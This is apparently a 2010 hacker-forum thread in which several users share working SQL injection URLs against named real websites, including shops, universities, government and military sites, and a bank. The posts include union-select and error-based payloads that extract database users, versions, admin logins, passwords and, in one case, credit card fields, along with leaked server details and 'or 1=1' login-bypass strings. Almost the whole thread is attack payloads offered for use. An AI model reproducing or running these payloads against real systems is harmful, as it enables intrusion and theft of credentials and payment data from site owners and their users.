http://shoppingtoursshanghai.com/page.php?id=-14+union+select+1,2,3,4,concat_ws(0x3a,user(),data base(),version()),6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30--
auth_root
09.11.2010, 01:00
http://www.dealbert.net/deal.php?id=2865143)+union+select+1,2,version(),4, 5,6,7,8,9,10,11--+
laptop shop
version 5.0.77
http://www.kharkov.net/internet.php3?categ=2+union+select+1,2,concat%28us er%28%29,0x3a,database%28%29,0x3a,version%28%29%29 ,4,5,6,7,8--
P.S. The output is at the bottom, on line 17...
PR 3 TIC 60 Alexa 1,191,694
http://www.kingdomready.org/humor.php?id=-36+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7--
nemaniak
10.11.2010, 00:11
Los Angeles Chinatown website
chinatownla.com PR-5
Code:
http://www.chinatownla.com/news.php?newsId=46-999.9+union+select+1,concat_ws%280x3a,version%28%2 9,user%28%29,database%28%29%29,3,4,5+--+
Code:
5.0.77:4470_user1517178@bh-usage.bluehalo.myregisteredsite.com:4470_chinatown lacom
Sri Lanka Army website
www.army.lk
Code:
http://www.army.lk/detailed.php?NewsId=495-999.9+union+select+1,concat_ws%280x3a,version%28%2 9,user%28%29,database%28%29%29,3,4,5,6,7,8+--+
Code:
5.0.77:sla_db@localhost:sla
shop
Code:
http://www.allanhouser.com/eventsDetail.php?id=9-999.9+union+select+1,2,3,4,group_concat(0x0b,table _name),6,7,8,9,10,11+from+information_schema.table s--
A couple of SQL injections
http://www.prof-nastill.ru/result.php?dealer=1&city_id=1+union+select+concat(user(),0x3a,database (),0x3a,version())--
ruprom@localhost:ruprom_ruprom:5.0.91-community
TIC 10 PR 1
http://www.center-prestige.ru/catalogue/preview/?section=-1+union+select+concat(user(),0x3a,database(),0x3a, version())--
newcenterpr1@localhost:db_newcenterpr1:5.0.67-community
TIC 120
moodoone
11.11.2010, 01:54
Code:
http://mosbeer.com.ua/index.php?page=-8+union+select+1,2,3,4,concat_Ws%280x3a,login,pass %29,6,7,8,9,10+from+admin--+
P.S. /admin
DeepBlue7
11.11.2010, 02:15
Code:
http://l2.gtuner.lv/?page=stats&serv=3+union+select+1,2,concat_ws(0x2f,login,passw ord),4,5,6,7,8,9,10,11,12,13,14+from+web_register_ tempusers+limit+1,1--
Version : 5.1.49-log
Database : web335db5
User : web335u5@localhost
http://forum.ampirk.ru/misc.php?sub=memberlist&filter=ad&searchuser=1&custom=1&qorder=and+1=2+union++select+1,concat%28username,c har%2858%29,pass%29,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27+from+amp_for um_users--
http://asiaatnite.com/forum/misc.php?sub=memberlist&filter=ad&searchuser=1&custom=1&qorder=and+1=2+union+select+1,concat%28user%28%29, 0x3a,version%28%29,0x3a,database%28%29%29,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26--
http://www.ashlyninstruments.com/products.php?prodid=-31+union+select+1,concat%28user%28%29,0x3a,databas e%28%29,0x3a,version%28%29%29,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32--
http://www.dealbert.net/deal.php?id=2865143)+union+select+1,2,UNHEX(HEX(co ncat_ws(nickname,0x3a,realname,0x3a,password))),4, 5,6,7,8,9,10,11+from+users+--+
to.Index
11.11.2010, 15:55
http://www.jubilee-centre.org/topics.php?topicID=convert(int,(CHAR(95)%2BCHAR(33 )%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2B CHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCH AR(97)))
TIC 10
Google PageRank 5
tits 70
«Всё видно!» ("Everything in sight!"): all about our eyesight: glasses, contact lenses, frames, optics
HTML:
http://vsevidno.ru/articles.html?article=-1+union+select+1,2,group_concat(login SEPARATOR 0x3a),group_concat(PASSWORD SEPARATOR 0x3a),5,6,7,8,9+from+vsevidno.kernel_users+--+
4 users
http://www.renwu-house.gov.tw/en/style/front001/bexfront.php?sid=316526172';select+cast(usename||c hr(58)||passwd as int),null,null,null,null,null,null,null+from+pg_sh adow--
http://www.tianliao-house.gov.tw/style/front001/bexfront.php?sid=316526172';select+cast(usename||c hr(58)||passwd as int),null,null,null,null,null,null,null+from+pg_sh adow--
http://www.alepe.pe.gov.br/paginas/?id=3525+and+1=(select+cast(usename||chr(58)||pass wd+as+int)+from+pg_shadow+limit+1+offset+1)
http://gov.boynecity.com/government.phtml?catid=330+and+1=version()::int
http://www.strvisa.com/?pg=5+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11 ,UNHEX(HEX(concat_ws(Login,0x3a,Password))),13,14, 15,16,17,18+from+str_admins+--+
DeepBlue7
13.11.2010, 15:39
Code:
http://benedict.ru/news/news.php?news_id=1337+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,table_name,14,15,16,17,18,19+from+info rmation_schema.tables+where+table_schema=database( )+limit+1,1--
user/version/db :
benedict_1@localhost/5.1.41/benedict_1
###
heks, this looks an awful lot like a copy-paste of an SqlIHelper 2.7 query. We're getting lazier and lazier.
http://www.rusbulat.ru/vopros.php?vid=6+and+1=0+UnIon+selECt+1,UNHEX(HEX( concat_ws(login,0x3a,pass))),3,4+from+admin+--+
http://www.khlebprod.ru/hoz2.php?vid=6+and+1=0+union+select+1,2,UNHEX(HEX( group_concat(table_name))),4,5+from+INFORMATION_SC HEMA.COLUMNS+where+Table_name=0x757365727175657374 +--+
Code:
http://www.homeopath.ru/index.php?action=pages&id=8+UNION+SELECT+1,2,concat_ws(0x3a,database(),us er(),version()),4,5,6,7--
http://www.fortresspersonal.com/picture.php?id=88609756518+union+select+1,2,concat _ws(0x3a,version(),user(),database()),4,5,6,7,8,9, 10,11,12--
version:5.0.32-Debian_7etch5~bpo31+1-log
usergw10_fortress@supremecenter31.com
databasegw10_fortress
Online store "Суши Дома" (Sushi Doma)
HTML:
http://sushidoma.net/catalog/ajax_order.php?id=-1+union+select+concat_ws(0x3a,id,last_name,first_n ame,middle_name,login,password,email,phone,address ),2,3+from+users+limit+0,1+--+&number=1
The result shows up in the shopping cart.
http://www.fsts.ac.ma/fsts/listeannuaires.php?idrubrique=-11+and+1=2+union+select+1,concat(@@version,0x20,us er(),database(),0x20,@@version_compile_os),3,4,5,6 ,7,8,9,10,11,12--
5.1.47 root@localhostouahainf_fsts redhat-linux-gnu
http://www.coralclubes.com/informacion_general.php?id=02+and+1=0+union+select +1,group_concat(username,char(58),password),3,4,5, 6,7+from+admin_usuarios
http://www.maranathafc.tg/template.php?page=detail_infos&id=432+and+1=2+union+select+1,group_concat(login,c har(58),password),3,4,5,6+from+user
http://www.eortologio.gr/data/bios.php/?id=614+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16+from+msysaccessobjects
http://wellunic.hu/content.php?id=19;select+version()::int,2+from+pg_ user--
http://elizabethnardo.hu/index.php?mode=menyasszony_hirek&cikk_id=95+and+1=0+union+select+1,2,3,concat_ws(0x 3a,h_name,h_passw),5,6,7,8+from+hirlevel
http://rugs.hu/?pg=product&id=1469'+or+(1,1)=(select+count(0),concat((select+ concat(substring(nick,1,64),char(58),substring(pas s,1,64))+from+admin+limit+0,1),floor(rand(0)*2))fr om(information_schema.tables)+group+by+2)--+
http://letoltokozpont.hu/letoltes_programok_reszletes.php?a=2546+or+(1,1)=( select+count(0),concat((select+version()+from+info rmation_schema.tables+limit+0,1),floor(rand(0)*2)) from(information_schema.tables)+group+by+2)--+%20&k=11
------------------------
SQLite
http://www.citytv.hu/musor_reszletezo.php?fk=17&mk=833&ms=1600&dt=20101114+union+select+sqlite_version()-- (no output, since there is only one column and it isn't displayed)
forum authentication bypass
http://www.citytv.hu/musor_reszletezo.php
username - admin' or 1=1--
password - any password
JohnnyBGoode
14.11.2010, 21:19
http://www.foto2web.ru/category-views.php?cat_id_name=6+union+select+1,2,3,4,5,con cat_ws(0x3a,version(),database(),user()),7,8,9,10, 11,12,13,14,15,16+--+
5.0.90:foto2web@localhost:foto2web
http://bestin-art.ru/view_desktop.php?cat=15'+and+1=0+union+select+1,2, concat_ws(0x3a,version(),database(),user()),4,5,6, 7,8,9+--+
5.1.36 :bestin@localhost:bestin
moodoone
15.11.2010, 00:50
Code:
http://hottur.org.ua/infrastruktura.php?id=-22+union+select+1,2,concat_ws%280x3a,login,passwor d%29,4+from+auth--
/admin/admin.php
Look at the developer's portfolio. Almost all of the sites are vulnerable.
DezMond™
15.11.2010, 19:21
A small collection
finexshop.ru TIC: 10 PR: 4
Code:
http://www.finexshop.ru/isp.php?iid=-121815+union+select+111,database()+--+&page=1&goods=397722
secure.pratt.duke.edu
Code:
http://secure.pratt.duke.edu/pratt_press/web.php?sid=169&iid=-20'+union+select+1,2,3,4,concat_ws(0x3a3a,username ,password),6,7,8,9,10,11+from+10ch.users+--+
transport-industry.com TIC: 10 PR: 4
Code:
http://www.transport-industry.com/distributors-ru.html?&L=5&tx_nicosdirectory_pi1%5Bmode%5D=liste&tx_nicosdirectory_pi1%5Bmodifier%5D=cat&tx_nicosdirectory_pi1%5Bvalue%5D=-6'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33+--+&tx_nicosdirectory_pi1%5Bpointer%5D=0&cHash=63294a3162
durlach.dlrg.de PR — 1
Code:
http://durlach.dlrg.de/gr/verein/termine/termine-detail.html?tx_dlrgterminkalender_pi1%5Baction%5D= read&tx_dlrgterminkalender_pi1%5Btid%5D=-74+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),13, 14,15,16+--+&cHash=4ccffcd4fab1dcc4c3bbe3a3882a18d5
songhai.org TIC: 10 PR: 5
Code:
http://www.songhai.org/index.php?option=com_content&view=article&id=82+union+select+user(),222,333+--+:commercialisation&catid=60':commercialisation
uniklinik-ulm.de TIC: 10 PR: 6
Code:
http://www.uniklinik-ulm.de/service/aktuelles/veranstaltungen/teaser-detailansicht.html?eventid=-441+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26+--+&cHash=6904a6d892
apostolic.edu TIC: 10 PR: 3
Code:
http://www.apostolic.edu/download.php?cmd=detail&&startLib=-00000000000000000000000000000000000000000000000030 '+union+select+1,group_concat(table_name),3+from+i nformation_schema.tables+group+by+table_schema+--+&startCat=00000000000000000000000000000000000000000 000000180&fid=0000000000000000000000000000000000000000000000 3007
math.niu.edu TIC: 50 PR: 6
Code:
http://www.math.niu.edu/grad/index.php?cmd=detail&id=-480'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,concat_Ws(0x3a3a,uname,pw d,super),24,25,26,27,28+from+inventory.users+--+
mrbunker.ru TIC: 40 PR: 4
Code:
http://www.mrbunker.ru/index.php?id=2&nid=-60+UNioN/**/+/**/SElEct+1,2,3,4,5,group_concat(table_name),7,8,9,10 +from+information_schema.tables+--+
samjicorp.co.kr
Code:
http://www.samjicorp.co.kr/bbs/view.html?id=-31521+union+select+1,2,3,version(),5,6,7,8,9,10,11 ,12,13+--+
hgn.de TIC: 10 PR: 3
Code:
http://www.hgn.de/index.php?inhalt=Presse&id=-369'+union+select+1,2,3,4,concat_ws(0x3a3a,admin,v orname,nachname,email,passwort)+from+user+--+
pcsoft.de TIC: 10 PR: 4
Code:
http://www.pcsoft.de/?id=glossar&L=1&tx_a21glossary%5Buid%5D=63+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24+/*+&tx_a21glossary%5Bback%5D=36&cHash=4f53095717
moodoone
15.11.2010, 23:07
Code:
http://www.autovirag.dp.ua/product_by_kind.php?id=-62+unIon+select+1,2,version%28%29,4--
harpandaltar.com
PR 5
Code:
http://www.harpandaltar.com/interior.php?t=s&i=3&p=26&e=-48+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7,8--
DeepBlue7
16.11.2010, 03:17
Code:
http://www.quadrantkindercentra.nl/kind.php?id=2+union+select+1,2,3,concat_ws(0x2f,Us erName,UserPass,UserEmail),5,6,7,8,9+from+users+li mit+1,1--
admin_quadrant@localhost/5.1.52-community-log/admin_quadrant
The output is in the title.
=============
Code:
http://www.waltonspianos.com/products/kind.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,concat_ws(0x2f,vers ion(),user(),database())--
5.0.83-log/waltonsp_ianos@boscgi1202.eigbox.net/waltonsp_db
=============
Code:
http://www.gitaristu.ru/bands/name.php?id=4+union+select+concat_ws(0x2f,username ,user_password),2,3,4,5+from+phpbb_users+limit+1,1--
5.1.52/gitaristu@localhost/gitaristu
lee.edu
PR - 6
Code:
http://www.lee.edu/ce/news_descr.asp?ID=-55+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7,8--
Code:
http://www.novo-med.ru/index.php?id=2+and+1=0+UNION+SELECT+1,concat_ws(0x 3a,database(),user(),version()),3,4,5--
DeepBlue7
19.11.2010, 22:18
Code:
http://www.signal-doroga.ru/produkt_view.php?id=20100+union+select+1,2,3,4,5,c oncat(user(),0x2f,database(),0x2f,version()),7,8,9 ,10--
user:u69347@10.8.0.125
db:u69347
ver:5.0.90-log
http://www.americatravel.ru/index.cfm?pid=116&cid=28+and+1=@@version
http://yahoo.firemoto.ru/bid.php?id=j66010243%27+and+1=@@version--+
Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
....
//// http://forum.xaknet.ru/showpost.php?p=37821&postcount=82
Repost
JohnnyBGoode
21.11.2010, 16:44
http://www.truvor.ru/news.php?id_new=91+union+select+1,2,3,4,concat_ws( 0x3a,version(),user(),database()),6,7,8,9
5.0.26-lk-log:truvorru_coffee@localhost:truvorru_coffee
http://www.distromania.com/distro_info.php?distro=620+and+1=(select+first+1+r db$relation_name+from+rdb$relation_fields)--
Firebird
authentication bypass
username - ' or 1=1--
password - any password
http://www.best-tel.ru/page.php?id=-4+UNION%20SELECT%20group_CONCAT%28id,0x3a,login,0x 3a,passw%29,2%20FROM%20users--+
http://www.fermatta.edu.mx/vernoticia.php?idnew=98768+and+1=0+union+select+1, concat(username,char(58),pass),3,4,5,6,7,8,9+from+ users1
http://www.ifodes.edu.mx/index.php?op=34+or+1+group+by+concat(version(),flo or(rand(0)*2))having+min(0)+or+1--
http://eliru.ru/articles.php?action=view&art=37+and+1=0+union+select+1,concat_ws%280x3a,log in,pass%29,3,4,5,6,7,8,9+from+mse_users--
Admin panel
Code:
http://eliru.ru/admin
moodoone
25.11.2010, 01:04
Code:
http://tk-sevntu.org.ua/articles_view.php?id=-401+union+select+concat_ws%280x3a,login,password%2 9,2,3,4,5+from+adminlist--
DeepBlue7
25.11.2010, 05:35
PR 3
Code:
http://www.latmet.lv/view.php?num=1+and+1=0+union+select+1,2,3,4,5,6,co ncat_ws(0x2f,user(),version(),database())--
latmet@localhost/5.1.36-community-log/ngs
totenkopf
25.11.2010, 13:06
http://www.grotec.co.uk/grotec_hydroponics_help_and_advice.php?helpID=-27+UNION+SELECT+1,2+--+
grotecdb@localhost:5.0.51a-3ubuntu5.8:grotecdb:debian-linux-gnu
Code:
http://www.flop.ru/product.php?id=-73%27+UNION+SELECT+1,group_concat%28column_name%29 ,3,concat_ws%280x3a3a,database%28%29,user%28%29,ve rsion%28%29,@@version_compile_os%29,5,6,7,8+FROM+I NFORMATION_SCHEMA.COLUMNS+where+table_name=char%28 97,117,116,104,114,101,103%29+--+
Code:
http://www.acousticstorm.com/interview.php?id=-73%27+UNION+SELECT+1,2,3,4,5,6,group_concat%28conc at_ws%280x3a3a,username,password,isAdmin%29%29+fro m+users+--+
А
Code:
http://www.meachamrifles.com/page.php?id=-73%27+UNION+SELECT+1,2,3,4,group_concat%28column_n ame%29,6,7+from+information_schema.columns+where+t able_name=%27users%27+--+
http://www.meachamrifles.com/info.php
TIC: 10
PR: 2
/discussion in PM =\
P.S. If anyone takes it further, post back, I'm curious
//
meachamrifles - repost
http://www.hackforums.net/showthread.php?tid=100011
BANK
http://www.bakhtarbank.com/subpage.php?id=-15+/*!UnIoN+SeLeCt*/+group_cOnCaT(tAblE_naMe)+from+information_schema. %60tables%60+WHERE+TabLE_SCHEma=0x626b626b6162756c 5f626b626462--
www.muenchen.de/service/branchenbuch/?s:bid=1262&sid=21179+or(1,2)=(select+count(*),concat((select+ 'asa'+from+information_schema.tables+limit+0,1),0x 3a,floor(rand()*2))+from+information_schema.tables +group+by+2+limit+0,1)--+
Version 5
Germans ... top-tier
http://www.research.ucdavis.edu/iuc/print.cfm?id=iuc,20,1764,1768+and+1=@@version
Microsoft SQL Server 2000 - 8.00.2055 (Intel X86)
Dec 16 2008 19:46:53
Copyright (c) 1988-2003 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
MastaBass1
27.11.2010, 01:09
Rockstargames!
http://www.rockstargames.com/classics/?id=2+and+1=0+union+select+1,2,3,4,5,6,concat_ws(0 x3a,version(),database(),user()),8,9
Yandex TIC (CY) 650
Google PageRank (PR) 6
Alexa Rank 7,293 +2,380
http://www.artamonovguber.ru/nakaz.php?mo=5+and+1=(select+first+1+distinct+rdb$ relation_name+from+rdb$relations+where+rdb$system_ flag=0)--
BlackSite
28.11.2010, 16:15
http://website.ptmd.nl/website.php?id=15-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11--
Host IP: 85.17.96.210
Web Server: Apache/2
Powered-by: PHP/5.2.14
satana-fu
28.11.2010, 23:39
http://www.unificado.com.br/novo/med/see.php?id=-87+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+--
http://www.snapcharity.org/content.php?pg=2&gid=462&cont=471+and+1=0+union+select+1,2,3,4,5,6,7,concat _ws(0x3a,login,password),9,10,11,12,13,14,15,16,17 ,18+from+users--
Here you go, doesn't seem to be a repost. The output looks nice, but it's of little use; the site is kind of dumb:
http://www.*moker*guide.com/*g/*moker*Guide/popup_ha*h_weed.php?id=-427+UNION+*ELECT+1,2,3,4,5,6,7,ver*ion(),databa*e( ),u*er(),11,12,13,14,15
Replace * with s and enjoy.
moodoone
29.11.2010, 23:39
Code:
http://www.originalstyle.com.ua/index.php?w=collections2&id=-1+union+select+1,version%28%29--
Code:
http://www.pro-school.com.ua/index.php?w=new&id=-577+union+select+1,2,3,4,5,version%28%29,7+--+
Code:
http://pro-kiev.com.ua/index.php?w=day&id=-511+union+select+1,2,3,version%28%29+--+
http://www.fourcty.org/news.php?id=39+or+(1,1)=(select+count(0),concat((s elect+version()+from+information_schema.tables+lim it+0,1),floor(rand(0)*2))from(information_schema.t ables)+group+by+2)--+&p=7
bloodAngel
30.11.2010, 22:47
Code:
http://www.rusmg.ru/php/contents.php?id=3824+and+substring(version(),1,1)= 5
))) TIC 375
http://www.holybiblesays.org/articles.php?ID=165+and+1=0+union(select+1,2,versi on(),4,5+from+information_schema.`tables`)
-------
http://www.textileinsight.com/articles.php?id=508'+and+1=0+union+select+1,2,3,4, 5,6,7,group_concat(email,0x3a,password),9,10,11,12 +from+users--+
--------
http://www.hackensackriverkeeper.org/Articles.php?ID=123+and+1=0+union+select+1,2,3,4,5 ,6,7,8,version(),10,11
--------
http://real-press.com/articles.php?id=81+and+1=2+union+select+1,2,3,4,5, 6,7,concat(login,char(58),password)+from+users_cp
--------
http://www.gridironstrategies.com/articles.php?id=28+and+1=0+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 ,41,42,43,44,45,46,group_concat(email,char(58),pas sword),48,49,50,51,52,53,54,55,56,57,58+from+gs_us ers--
-------
http://www.runninginsight.com/articles.php?id=130'++and+1=0+union+select+1,2,3,4 ,5,6,7,group_concat(email,0x3a,password),9,10,11,1 2+from+users--+
nemaniak
01.12.2010, 03:16
www.the-numbers.com PR-4 TIC-50
Code:
http://www.the-numbers.com/interactive/newsStory.php?newsID=-1656+union+select+1,concat_ws%280x3a,version%28%29 ,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18+--+
Code:
5.0.45:thenumbers_main@localhost:thenumbers_main
www.mcc.commnet.edu PR-6
Code:
http://www.mcc.commnet.edu/newsView.php?newsID=-547+union+select+concat_ws%280x3a,version%28%29,us er%28%29,database%28%29%29,2,3,4,5,6,7,8,9,0,11+--+
Code:
4.1.22:macmcc@localhost:mcc
http://opekaweb.ru/news.php?ocd=view&id=18'+or+(1,1)=(select+count(0),concat((select+co ncat(username,0x3a,passwd)+from+members+limit+0,1) ,floor(rand(0)*2))+from+(information_schema.tables )+group+by+2)+--+'
Code:
http://www.diebold-russia.ru/about/index.php?pmenu=1&ac=3&id=-5+UNION+SELECT+1,2,3,4,5,6--
Diebold is a company that manufactures ATMs.
moodoone
02.12.2010, 16:25
Code:
http://boolean.org.ua/index.php?a=-7+union+select+1,concat_ws%280x3a,username,passwor d%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30+from+jos_users--+
Code:
http://interatletika.cv.ua/product.php?a=10&id_categ=-34+union+select+1,version%28%29,3--
Code:
http://www.r-avto.kiev.ua/view_items.php?catid=-17+union+select+1,version%28%29,3--
http://www.chavarock.com/cine.php?id=-10+/*!union*/+/*!select*/+1,concat%28version%28%29,0x3a,user%28%29,0x3a,dat abase%28%29%29,3,4,5,6,7
5.0.91-community:chavaroc_mescali@localhost:chavaroc_mscb log
http://www.mes-surfboards.com/en/accessoires.php?id=10+or+1+group+by+concat(version (),floor(rand(0)*2))having+min(0)+or+1--
http://www.serrelib.gr/cine.php?id=-7%27+UNION+SELECT+1,2,3,4,5,6,AES_DECRYPT%28AES_EN CRYPT%28CONCAT_WS%280x3a,Version%28%29,Database%28 %29,User%28%29%29,0x71%29,0x71%29,8--%20+
Database Version: 5.0.18-nt
Database name: serrelibdb
User name: serrelib@localhost
http://www.psp-umd.com/Jeux-Video-Live_503+and+1=0+union+select+1,2,3,4,5,unhex(hex( @@version)),7,8,9,10,11--.html
http://www.899laclasica.com/cine.php?id=-8679+/*!UNION*/+/*!SELECT*/+1,concat%28version%28%29,0x3a,user%28%29,0x3a,dat abase%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17--%20+&enviar1=1&xparam=HARRY%20POTTER%20Y%20LAS%20RELIQUIAS%20DE%2 0LA%20MUERTE
5.1.50:cf_usr899laclasi@localhost:comprandofacil_8 99laclasica
http://www.galex-international.de/accessoires.php?id=186+and+1=0+union+select+concat _ws(0x3a,cc_type,cc_owner,cc_number,cc_expires)+fr om+osc_orders+where+cc_expires=0910--
DeepBlue7
02.12.2010, 22:47
PR 3
http://www.arsenicoproducciones.com/cine.php?id=26+and+1=0+union+select+1,2,3,4,5,6,7, 8,concat_ws(0x2f,user(),version(),database()),10,1 1,12,13,14--
sopor_arsenico@localhost/5.0.68/soporte_web
http://en.throttleman.com/clipping.php?id=173%27+UNION+SELECT+1,2,3,concat_w s%280x3a,version%28%29,database%28%29,user%28%29%2 9,5,6,7,8,9,10,11,12,13+limit+1,1--+
5.0.77:mv_mundofunny:mvmfcm@localhost
DeepBlue7
02.12.2010, 22:55
PR 5
http://www.cartelera.com.uy/cine.php?id=45+and+1=0+union+select+1,concat_ws(0x 2f,user(),version(),database()),3--
cartelera@localhost/5.0.48/cartelera
http://chudovomebel.ru/tovar.php?id=-12+union+select+1,2,concat_ws%280x3a,version%28%29 ,database%28%29,user%28%29%29,4,5
5.0.51a-24+lenny2:a12807_chudovo:root@localhost